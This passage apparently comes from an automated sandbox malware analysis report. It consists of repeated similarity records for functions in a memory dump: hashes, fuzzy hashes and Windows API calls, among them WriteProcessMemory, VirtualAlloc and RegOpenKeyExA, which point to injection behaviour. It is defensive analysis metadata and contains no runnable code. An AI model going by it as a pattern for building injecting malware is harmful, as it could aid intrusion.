                    • Opcode ID: 17b0c341b52739a790c545d3b2fd629092981d63857a88dcb1ee279f33b8d765
                    • Instruction ID: 7054b1ae239bbd5b939f27bebd9c4d8542634c326e46a615b8c65cc6352e26a8
                    • Opcode Fuzzy Hash: 17b0c341b52739a790c545d3b2fd629092981d63857a88dcb1ee279f33b8d765
                    • Instruction Fuzzy Hash: 8341E43AE446258FDF16CE54CC81BADB7B1FB98304F5655A8D08AFB240CA34EE419F50
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.331634198.0000000000D90000.00000040.00000001.sdmp, Offset: 00D90000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_d90000_mllvvvh.jbxd
                    Similarity
                    • API ID:
                    • String ID: @
                    • API String ID: 0-2766056989
                    • Opcode ID: b820873df2fcea4a6e708b8f9a5522c674a9895d130da8e17574ea9c0984405b
                    • Instruction ID: cad01652d527a229700890bf5bc8388bef70f71dc6e491400a64710361c3d746
                    • Opcode Fuzzy Hash: b820873df2fcea4a6e708b8f9a5522c674a9895d130da8e17574ea9c0984405b
                    • Instruction Fuzzy Hash: 00517B35E18607EDEF39AB70AC12B7D2D54FF91B00F289559B28796082EE39CB816531
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.331634198.0000000000D90000.00000040.00000001.sdmp, Offset: 00D90000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_d90000_mllvvvh.jbxd
                    Similarity
                    • API ID: ExitProcess
                    • String ID: read
                    • API String ID: 621844428-2555855207
                    • Opcode ID: cb6bd99a343ba0c5f25fd0ccd8ce41c5f4a862fcf58d9a64fa7457bc24e33bc0
                    • Instruction ID: 42558203aff2e5e18976bffcc54f9d9a24f6d584198d9ed0fe36b64f144601e9
                    • Opcode Fuzzy Hash: cb6bd99a343ba0c5f25fd0ccd8ce41c5f4a862fcf58d9a64fa7457bc24e33bc0
                    • Instruction Fuzzy Hash: EDF0E93176C512FDEF5EA3646C2293D1884FBA0B19B16D22DB087D5187ED28C9012072
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.331634198.0000000000D90000.00000040.00000001.sdmp, Offset: 00D90000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_d90000_mllvvvh.jbxd
                    Similarity
                    • API ID: ExitProcess
                    • String ID: read
                    • API String ID: 621844428-2555855207
                    • Opcode ID: c55a1e3579fd569a3a4676985bf2f89f8d330299d34ffc2bbc19bbe4e4652b72
                    • Instruction ID: 84080405534fda6f86967751bfa82610f5e0fb449764ccb016e8928b9638138d
                    • Opcode Fuzzy Hash: c55a1e3579fd569a3a4676985bf2f89f8d330299d34ffc2bbc19bbe4e4652b72
                    • Instruction Fuzzy Hash: B8F0E521669502BDBF6E77602C22D390849FBA0B19725D20DB087C9587FD2889462471
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.331634198.0000000000D90000.00000040.00000001.sdmp, Offset: 00D90000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_d90000_mllvvvh.jbxd
                    Similarity
                    • API ID:
                    • String ID: m
                    • API String ID: 0-3775001192
                    • Opcode ID: 22f51a0c6e4f82a2a73faf25d516c2bad06a7d5efb6946187ae1608bb3eb2431
                    • Instruction ID: 8531645750998556f7c36ac68e7814add30bb8ac59ed73e25f1f2eb7a888f583
                    • Opcode Fuzzy Hash: 22f51a0c6e4f82a2a73faf25d516c2bad06a7d5efb6946187ae1608bb3eb2431
                    • Instruction Fuzzy Hash: 7B517C32E18201EDEF05DB64AC52B3C7EA9FF41708F28D119A087AB163DE74C9019BB1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.331634198.0000000000D90000.00000040.00000001.sdmp, Offset: 00D90000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_d90000_mllvvvh.jbxd
                    Similarity
                    • API ID: Initialize
                    • String ID: m
                    • API String ID: 2538663250-3775001192
                    • Opcode ID: 516fedfe359e9bc17fdc314171fedff6de38101870687e966c8db859eec00c60
                    • Instruction ID: 9adc5b25a354f67b4662611622211014903ef4205f2182e47439024df3d503a2
                    • Opcode Fuzzy Hash: 516fedfe359e9bc17fdc314171fedff6de38101870687e966c8db859eec00c60
                    • Instruction Fuzzy Hash: E1515C32918601EDEF05DBA4AD52B3D7EA9FF41708F28D119A0879B163DE74C9019AB1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.331634198.0000000000D90000.00000040.00000001.sdmp, Offset: 00D90000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_d90000_mllvvvh.jbxd
                    Similarity
                    • API ID: Initialize
                    • String ID: m
                    • API String ID: 2538663250-3775001192
                    • Opcode ID: cd1b1c505157a8ba16f0de916322fb71060366f9898df66083f292515782007f
                    • Instruction ID: db69eb702fce153b068c1272854d4cb9592bfd9b9f9b9390e9777082ba9ef7d8
                    • Opcode Fuzzy Hash: cd1b1c505157a8ba16f0de916322fb71060366f9898df66083f292515782007f
                    • Instruction Fuzzy Hash: A7416A32D18701EDEF05DBA0AC42B3C7EA9FF41308F28D119A0879B163DE74C9019AB1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • VirtualAlloc.KERNELBASE ref: 00D912B0
                    • ReadFile.KERNELBASE(?,?,?,?,?), ref: 00D9137C
                    Memory Dump Source
                    • Source File: 00000002.00000002.331634198.0000000000D90000.00000040.00000001.sdmp, Offset: 00D90000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_d90000_mllvvvh.jbxd
                    Similarity
                    • API ID: AllocFileReadVirtual
                    • String ID:
                    • API String ID: 237865483-0
                    • Opcode ID: 557cdcc39c23c8639c6a724c4ccfcc95f9922060c4b41ae0de32f6856295eeb9
                    • Instruction ID: a6ef72decdc145d97977fc0a5896175976920ed08e8502f3c9a54809d3a0f2df
                    • Opcode Fuzzy Hash: 557cdcc39c23c8639c6a724c4ccfcc95f9922060c4b41ae0de32f6856295eeb9
                    • Instruction Fuzzy Hash: 4F31573DA28117AEEF2B77608C03E382EA9FBC2704F24D149A083D9182ED348A026435
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • VirtualAlloc.KERNELBASE ref: 00D912B0
                    • ReadFile.KERNELBASE(?,?,?,?,?), ref: 00D9137C
                    Memory Dump Source
                    • Source File: 00000002.00000002.331634198.0000000000D90000.00000040.00000001.sdmp, Offset: 00D90000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_d90000_mllvvvh.jbxd
                    Similarity
                    • API ID: AllocFileReadVirtual
                    • String ID:
                    • API String ID: 237865483-0
                    • Opcode ID: 2345ff6e8315cfd2208d5671bc11a5bcfb8dafb5c5efe15de6b2c50965d4fb6d
                    • Instruction ID: b58cd8c315b709e4a3fc6c3cdfaffa79052bd388a4ddc8c584d93d0ba0b5c48d
                    • Opcode Fuzzy Hash: 2345ff6e8315cfd2208d5671bc11a5bcfb8dafb5c5efe15de6b2c50965d4fb6d
                    • Instruction Fuzzy Hash: 6931262DA28517AEEF2B77604C03E796E69FBC2705F24D149A087D9583ED358A026435
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • VirtualAlloc.KERNELBASE ref: 00D912B0
                    • ReadFile.KERNELBASE(?,?,?,?,?), ref: 00D9137C
                    Memory Dump Source
                    • Source File: 00000002.00000002.331634198.0000000000D90000.00000040.00000001.sdmp, Offset: 00D90000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_d90000_mllvvvh.jbxd
                    Similarity
                    • API ID: AllocFileReadVirtual
                    • String ID:
                    • API String ID: 237865483-0
                    • Opcode ID: 6bd592971602314f8097fbff9fa399dad12e58fc6d5e572a2e8fff8a3c20566f
                    • Instruction ID: 022615c6d0dc28df17d8d6aebd16d2f296a0bc8451e14fd434ab6688558b02c8
                    • Opcode Fuzzy Hash: 6bd592971602314f8097fbff9fa399dad12e58fc6d5e572a2e8fff8a3c20566f
                    • Instruction Fuzzy Hash: E231492DA24557AEDF2777704C03E7C2E69FBC3304F24D248A087D5583ED358A026575
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • VirtualAlloc.KERNELBASE ref: 00D912B0
                    • ReadFile.KERNELBASE(?,?,?,?,?), ref: 00D9137C
                    Memory Dump Source
                    • Source File: 00000002.00000002.331634198.0000000000D90000.00000040.00000001.sdmp, Offset: 00D90000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_d90000_mllvvvh.jbxd
                    Similarity
                    • API ID: AllocFileReadVirtual
                    • String ID:
                    • API String ID: 237865483-0
                    • Opcode ID: 4888ca9778e5dd17e4a144d2a959001da2cb10f22221b03b64b5fbbbd99a0110
                    • Instruction ID: 21dc6d64fe348e21e287333bbe8e56a817e61b7c4bc82b6eaf2c7609ed981df4
                    • Opcode Fuzzy Hash: 4888ca9778e5dd17e4a144d2a959001da2cb10f22221b03b64b5fbbbd99a0110
                    • Instruction Fuzzy Hash: D921787DE241179EEF27AB308C02AB92E79FBC2705F14E149A082D5553ED348B026971
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • VirtualAlloc.KERNELBASE ref: 00D912B0
                      • Part of subcall function 00D912FD: ReadFile.KERNELBASE(?,?,?,?,?), ref: 00D9137C
                    Memory Dump Source
                    • Source File: 00000002.00000002.331634198.0000000000D90000.00000040.00000001.sdmp, Offset: 00D90000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_d90000_mllvvvh.jbxd
                    Similarity
                    • API ID: AllocFileReadVirtual
                    • String ID:
                    • API String ID: 237865483-0
                    • Opcode ID: 4a9d0029bf77a45e0f1f56a039a75d53bdcb41ff4d69050af763e70dfa8184b6
                    • Instruction ID: ec1b68840c769a1401d5bfc3072b9e996041ae56f7e816a3d660823f8094555a
                    • Opcode Fuzzy Hash: 4a9d0029bf77a45e0f1f56a039a75d53bdcb41ff4d69050af763e70dfa8184b6
                    • Instruction Fuzzy Hash: D521236DE24557AEEF2B67604C03E796E69FBC2704F18A248A083D9583ED358A026571
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • VirtualAlloc.KERNELBASE ref: 00D912B0
                      • Part of subcall function 00D912FD: ReadFile.KERNELBASE(?,?,?,?,?), ref: 00D9137C
                    Memory Dump Source
                    • Source File: 00000002.00000002.331634198.0000000000D90000.00000040.00000001.sdmp, Offset: 00D90000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_d90000_mllvvvh.jbxd
                    Similarity
                    • API ID: AllocFileReadVirtual
                    • String ID:
                    • API String ID: 237865483-0
                    • Opcode ID: f58949bd25e95dea7aed7e68cc49ba356eaf0c8cab9df56d26ca38ebbcbf4dea
                    • Instruction ID: e97de0711e7f44b89ce1935b803ee95fd3aa1bbe1d3fb0721cf565b45e3f6fa9
                    • Opcode Fuzzy Hash: f58949bd25e95dea7aed7e68cc49ba356eaf0c8cab9df56d26ca38ebbcbf4dea
                    • Instruction Fuzzy Hash: 3021246DE24517AEEF2B67604C03A792E6DFBC2704F14A148A087D9583EE358A026971
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • VirtualAlloc.KERNELBASE ref: 00D912B0
                      • Part of subcall function 00D912FD: ReadFile.KERNELBASE(?,?,?,?,?), ref: 00D9137C
                    Memory Dump Source
                    • Source File: 00000002.00000002.331634198.0000000000D90000.00000040.00000001.sdmp, Offset: 00D90000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_d90000_mllvvvh.jbxd
                    Similarity
                    • API ID: AllocFileReadVirtual
                    • String ID:
                    • API String ID: 237865483-0
                    • Opcode ID: 2a603f0e1d2de1d0b3868fffa6be2bc5e14fdd64d552faa053dd15ac46bd165e
                    • Instruction ID: 1bc24b32633e859970bbe7eb74c059734405d94e15e5062ca0010e268942c403
                    • Opcode Fuzzy Hash: 2a603f0e1d2de1d0b3868fffa6be2bc5e14fdd64d552faa053dd15ac46bd165e
                    • Instruction Fuzzy Hash: 6221463DA24117AEDF2B6B708C03A782E79EBC2704F14E148A087D9583DE358B025931
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • VirtualAlloc.KERNELBASE ref: 00D912B0
                      • Part of subcall function 00D912FD: ReadFile.KERNELBASE(?,?,?,?,?), ref: 00D9137C
                    Memory Dump Source
                    • Source File: 00000002.00000002.331634198.0000000000D90000.00000040.00000001.sdmp, Offset: 00D90000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_d90000_mllvvvh.jbxd
                    Similarity
                    • API ID: AllocFileReadVirtual
                    • String ID:
                    • API String ID: 237865483-0
                    • Opcode ID: 747cbf19506efbab8eccc3a2b0cc829c130a30676cb9ada8116f90b52f7eea42
                    • Instruction ID: 0332edaf4d405a213b77679d64e52c317d92eb03e6db8c1012dc085ead078c3e
                    • Opcode Fuzzy Hash: 747cbf19506efbab8eccc3a2b0cc829c130a30676cb9ada8116f90b52f7eea42
                    • Instruction Fuzzy Hash: 2321387DA241169EDF2B6B708C03A786E79EBC2304F14E149A087D5543DD354B025971
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000002.00000002.331634198.0000000000D90000.00000040.00000001.sdmp, Offset: 00D90000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_d90000_mllvvvh.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 26960fc846f8da6b10e223ccdbd21484f3497de6032a972b72585f5af6b37238
                    • Instruction ID: d614126690d83af92a938d46e5a2a8719738dc236c21c77e4d160dcf8772ff60
                    • Opcode Fuzzy Hash: 26960fc846f8da6b10e223ccdbd21484f3497de6032a972b72585f5af6b37238
                    • Instruction Fuzzy Hash: 06519D39E2C647EDEF3AAB706C12B792D59FF81B00F249119F28795082EE75CB816531
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000002.00000002.331634198.0000000000D90000.00000040.00000001.sdmp, Offset: 00D90000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_d90000_mllvvvh.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 93f14e04f7cf3b6f39ad2e16ec220aee6291f99485a428cea0333de025a3d837
                    • Instruction ID: fd8ffa54cba456c3c3bb88c10eaeea4525ce687aed0037d20bfeff88ae8cc084
                    • Opcode Fuzzy Hash: 93f14e04f7cf3b6f39ad2e16ec220aee6291f99485a428cea0333de025a3d837
                    • Instruction Fuzzy Hash: 62518C39E2C647EDEF3AAB606C12B792D54FF80B01F24911DF28B95082EE75CB815531
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000002.00000002.331634198.0000000000D90000.00000040.00000001.sdmp, Offset: 00D90000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_d90000_mllvvvh.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 04a73eaf2ff404960f5eaca17fdd77c68b7261e0e16dc6fac4e14b75259584c4
                    • Instruction ID: d85091a9e0a4642954400a352611071740b60a02bd67242cbafe95e13baef19d
                    • Opcode Fuzzy Hash: 04a73eaf2ff404960f5eaca17fdd77c68b7261e0e16dc6fac4e14b75259584c4
                    • Instruction Fuzzy Hash: F1419E39E18643EDFF39AB706C02B7D2955FF80B01F249119B24B990C2EE758B815531
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000002.00000002.331634198.0000000000D90000.00000040.00000001.sdmp, Offset: 00D90000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_d90000_mllvvvh.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 9e1f44333333c3b3db287a12a561cbdf059bd621d2cb28150a4d4097a54772a1
                    • Instruction ID: 3b2647865bfef9fa87a2a7fb212b6e63e15d27124a3f96355490a5b1ced97791
                    • Opcode Fuzzy Hash: 9e1f44333333c3b3db287a12a561cbdf059bd621d2cb28150a4d4097a54772a1
                    • Instruction Fuzzy Hash: 6A416D39E18657EDEF3AAB705C02B7D2A54FF81B01F24921DB28B990C2EE758A815531
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000002.00000002.331634198.0000000000D90000.00000040.00000001.sdmp, Offset: 00D90000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_d90000_mllvvvh.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 11ddbe8b0d2afa93fd9251e9774ee83570d27912607ef50639023ae84ffb9c1a
                    • Instruction ID: 485d924c18c2d4116b6f187bb0dfaaabde56a9a2727333f45e9a48801523b2c1
                    • Opcode Fuzzy Hash: 11ddbe8b0d2afa93fd9251e9774ee83570d27912607ef50639023ae84ffb9c1a
                    • Instruction Fuzzy Hash: FC418039E18657EDEF39AB705C12B7D2A54FF80B00F24911DF24B950C2EE758B815531
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • RegOpenKeyExA.KERNELBASE(00000000), ref: 00D9052E
                    Memory Dump Source
                    • Source File: 00000002.00000002.331634198.0000000000D90000.00000040.00000001.sdmp, Offset: 00D90000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_d90000_mllvvvh.jbxd
                    Similarity
                    • API ID: Open
                    • String ID:
                    • API String ID: 71445658-0
                    • Opcode ID: f360cb25ee24762f1a72c315db08375b2e1e1844ce2c11367e3e64feb230cba2
                    • Instruction ID: 18bb11575e495c1ac1e676295bb05d34fa739ea6441c134e4914aa6e5fe21c58
                    • Opcode Fuzzy Hash: f360cb25ee24762f1a72c315db08375b2e1e1844ce2c11367e3e64feb230cba2
                    • Instruction Fuzzy Hash: 42316B31A1C001FDEF1AA6B1EC02A3D3D15EB82705F25D42CE2C7A7052ED3189029A72
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 00D91DFF
                    Memory Dump Source
                    • Source File: 00000002.00000002.331634198.0000000000D90000.00000040.00000001.sdmp, Offset: 00D90000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_d90000_mllvvvh.jbxd
                    Similarity
                    • API ID: MemoryProcessWrite
                    • String ID:
                    • API String ID: 3559483778-0
                    • Opcode ID: 03a8a0e5359804c419903552202bc81913591781f27f36925624dcb1d3500a26
                    • Instruction ID: 02a2f345e8466e2a6ae16e162ad67a8938c419f5682388800f93e382467f20e4
                    • Opcode Fuzzy Hash: 03a8a0e5359804c419903552202bc81913591781f27f36925624dcb1d3500a26
                    • Instruction Fuzzy Hash: 33317B3D629513ADEF1B67619C11A3E3999FF82B05F685519F483CA143EE34C9016531
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • CreateFileW.KERNELBASE(?,00000000,398A9A0F), ref: 00D91114
                    Memory Dump Source
                    • Source File: 00000002.00000002.331634198.0000000000D90000.00000040.00000001.sdmp, Offset: 00D90000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_d90000_mllvvvh.jbxd
                    Similarity
                    • API ID: CreateFile
                    • String ID:
                    • API String ID: 823142352-0
                    • Opcode ID: 8a0cdac0080417db277899794cfd63dbe2429346801c8ef87e9ec42bdefde83b
                    • Instruction ID: 514e15eec0d67c18ec05bb4fb3fc07f58c780b6d5c6654922bf7729212daaaff
                    • Opcode Fuzzy Hash: 8a0cdac0080417db277899794cfd63dbe2429346801c8ef87e9ec42bdefde83b
                    • Instruction Fuzzy Hash: AD316E3DE28647EDFF39A7715C02B7D2A54FF81701F249219B28BA50C2ED76CA815531
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000002.00000002.331634198.0000000000D90000.00000040.00000001.sdmp, Offset: 00D90000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_d90000_mllvvvh.jbxd
                    Similarity
                    • API ID: Open
                    • String ID:
                    • API String ID: 71445658-0
                    • Opcode ID: 7013abfe96adcce5707ab82630f18204e182155a70321e584d08f785f950927b
                    • Instruction ID: 6e85e20b2a284e0b100e46751ab1dea5a1076701b1a6b53587c6b4fb0c9366a7
                    • Opcode Fuzzy Hash: 7013abfe96adcce5707ab82630f18204e182155a70321e584d08f785f950927b
                    • Instruction Fuzzy Hash: F2315B3291C402FDEF5A63B1AC12A3D7D15FB42745F25D42DE2C797053ED318902AAB2
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • CreateFileW.KERNELBASE(?,00000000,398A9A0F), ref: 00D91114
                    Memory Dump Source
                    • Source File: 00000002.00000002.331634198.0000000000D90000.00000040.00000001.sdmp, Offset: 00D90000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_d90000_mllvvvh.jbxd
                    Similarity
                    • API ID: CreateFile
                    • String ID:
                    • API String ID: 823142352-0
                    • Opcode ID: 282981bc8be1fdd28aeaaddc6f11a103794a354364ab08f14370f2deee634856
                    • Instruction ID: e758ed7e73ed720c558fb119e51b6f023879e79f818e0f7a74553ce111ddc3ef
                    • Opcode Fuzzy Hash: 282981bc8be1fdd28aeaaddc6f11a103794a354364ab08f14370f2deee634856
                    • Instruction Fuzzy Hash: FF319D3DE28647EDFF39A7716C02F7D2954FF80B41F249208B28BA50C2ED368A816531
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000002.00000002.331634198.0000000000D90000.00000040.00000001.sdmp, Offset: 00D90000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_d90000_mllvvvh.jbxd
                    Similarity
                    • API ID: Open
                    • String ID:
                    • API String ID: 71445658-0
                    • Opcode ID: 4f6be46e81c59d9b536364f6f0626e577d1a83cb315d6d293aaa5c9019b950c3
                    • Instruction ID: ff858497919036a661b160eb5fde3376b87ec7c012c02aca653103724dac0dd3
                    • Opcode Fuzzy Hash: 4f6be46e81c59d9b536364f6f0626e577d1a83cb315d6d293aaa5c9019b950c3
                    • Instruction Fuzzy Hash: B2318C3291C101FDEF5A63B1AC03A3D7D15EB42715F29D46DE2C797053DD318902AAB2
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • CreateFileW.KERNELBASE(?,00000000,398A9A0F), ref: 00D91114
                    Memory Dump Source
                    • Source File: 00000002.00000002.331634198.0000000000D90000.00000040.00000001.sdmp, Offset: 00D90000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_d90000_mllvvvh.jbxd
                    Similarity
                    • API ID: CreateFile
                    • String ID:
                    • API String ID: 823142352-0
                    • Opcode ID: 9c1f7e909fd3eea8a8a6f6b19e39fb1135c319c9b7c8841bc970084fcdb5188f
                    • Instruction ID: b3a344fff0e7102c67f9d236b0f50649bfb5493333467f2ec9db54b4f81af5e6
                    • Opcode Fuzzy Hash: 9c1f7e909fd3eea8a8a6f6b19e39fb1135c319c9b7c8841bc970084fcdb5188f
                    • Instruction Fuzzy Hash: 16318C3DE28253EDFF3AA7715C02B7D2A54FB81701F249209B28BA50C2ED368AC15531
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • CreateFileW.KERNELBASE(?,00000000,398A9A0F), ref: 00D91114
                    Memory Dump Source
                    • Source File: 00000002.00000002.331634198.0000000000D90000.00000040.00000001.sdmp, Offset: 00D90000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_d90000_mllvvvh.jbxd
                    Similarity
                    • API ID: CreateFile
                    • String ID:
                    • API String ID: 823142352-0
                    • Opcode ID: 5a38f640a3c8a1dd13314036b4660e7b20149f41f2e0013dbe6fa994cc312140
                    • Instruction ID: e30cd153f2d88dbecafbb1b7d8c40831adcd2976b56ed01c5ebe14e1353c32de
                    • Opcode Fuzzy Hash: 5a38f640a3c8a1dd13314036b4660e7b20149f41f2e0013dbe6fa994cc312140
                    • Instruction Fuzzy Hash: 03315A3DE14713AEEF29AB309C02B7D7A65FB80701F119249F14BB5085EE358B415A71
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 00D91DFF
                    Memory Dump Source
                    • Source File: 00000002.00000002.331634198.0000000000D90000.00000040.00000001.sdmp, Offset: 00D90000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_d90000_mllvvvh.jbxd
                    Similarity
                    • API ID: MemoryProcessWrite
                    • String ID:
                    • API String ID: 3559483778-0
                    • Opcode ID: 0f781015eee9def8cba4f67d4cabd7fb6a662d9d90dd8ca40c510e634fc99889
                    • Instruction ID: b440be60b1c1e704d0a967b337c18bff182cd2c62c080d9b143a77a349e59fcf
                    • Opcode Fuzzy Hash: 0f781015eee9def8cba4f67d4cabd7fb6a662d9d90dd8ca40c510e634fc99889
                    • Instruction Fuzzy Hash: 0B21073DA29517ADFF1A77615C12A3E2859FF81B15F68961CB483C9083EE38C5026531
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000002.00000002.331634198.0000000000D90000.00000040.00000001.sdmp, Offset: 00D90000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_d90000_mllvvvh.jbxd
                    Similarity
                    • API ID: CreateFile
                    • String ID:
                    • API String ID: 823142352-0
                    • Opcode ID: a893d6afd5c6605f07021a134821f30031c9c8260e14392896996136f05ef476
                    • Instruction ID: 8afb23a094227fb3e7fc724ca24a575a78bf5349db838f1231bbb9607ba7b76f
                    • Opcode Fuzzy Hash: a893d6afd5c6605f07021a134821f30031c9c8260e14392896996136f05ef476
                    • Instruction Fuzzy Hash: 5321687DE28297EDFF29A7715C02B792A54FB81701F24A20CB24BA50C2ED768AC15971
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 00D91DFF
                    Memory Dump Source
                    • Source File: 00000002.00000002.331634198.0000000000D90000.00000040.00000001.sdmp, Offset: 00D90000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_d90000_mllvvvh.jbxd
                    Similarity
                    • API ID: MemoryProcessWrite
                    • String ID:
                    • API String ID: 3559483778-0
                    • Opcode ID: ec60615dc82382a16c526ca4507f80c62e857d2befcbf524650c4a297530c541
                    • Instruction ID: b1502ffe1d4a3a0de27ddf189eff0f0ff8cd2d5083ef8d9958641f71ae0d9141
                    • Opcode Fuzzy Hash: ec60615dc82382a16c526ca4507f80c62e857d2befcbf524650c4a297530c541
                    • Instruction Fuzzy Hash: 56213A2D629513AEFF1777715C0293E2D99FF82715B28961CB48385082EE34C5027572
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000002.00000002.331634198.0000000000D90000.00000040.00000001.sdmp, Offset: 00D90000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_d90000_mllvvvh.jbxd
                    Similarity
                    • API ID: CreateFile
                    • String ID:
                    • API String ID: 823142352-0
                    • Opcode ID: f3c78511967c2744fde6c4839ab72bb6babc845e987d3e7224732e9e23122f51
                    • Instruction ID: 5ea81d0dea9f37141c3992e33865808cce1c9d19883c1ffb4046fc6c8afd1d44
                    • Opcode Fuzzy Hash: f3c78511967c2744fde6c4839ab72bb6babc845e987d3e7224732e9e23122f51
                    • Instruction Fuzzy Hash: 8D219E7DE18257EDFF39A7715C02B7D2A54FB80701F24A209F24BA50C2ED768AC15931
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • RegOpenKeyExA.KERNELBASE(00000000), ref: 00D9052E
                    Memory Dump Source
                    • Source File: 00000002.00000002.331634198.0000000000D90000.00000040.00000001.sdmp, Offset: 00D90000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_d90000_mllvvvh.jbxd
                    Similarity
                    • API ID: Open
                    • String ID:
                    • API String ID: 71445658-0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000002.00000002.331634198.0000000000D90000.00000040.00000001.sdmp, Offset: 00D90000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_d90000_mllvvvh.jbxd
                    Similarity
                    • API ID: CreateFile
                    • String ID:
                    • API String ID: 823142352-0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 00D91DFF
                    Memory Dump Source
                    • Source File: 00000002.00000002.331634198.0000000000D90000.00000040.00000001.sdmp, Offset: 00D90000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_d90000_mllvvvh.jbxd
                    Similarity
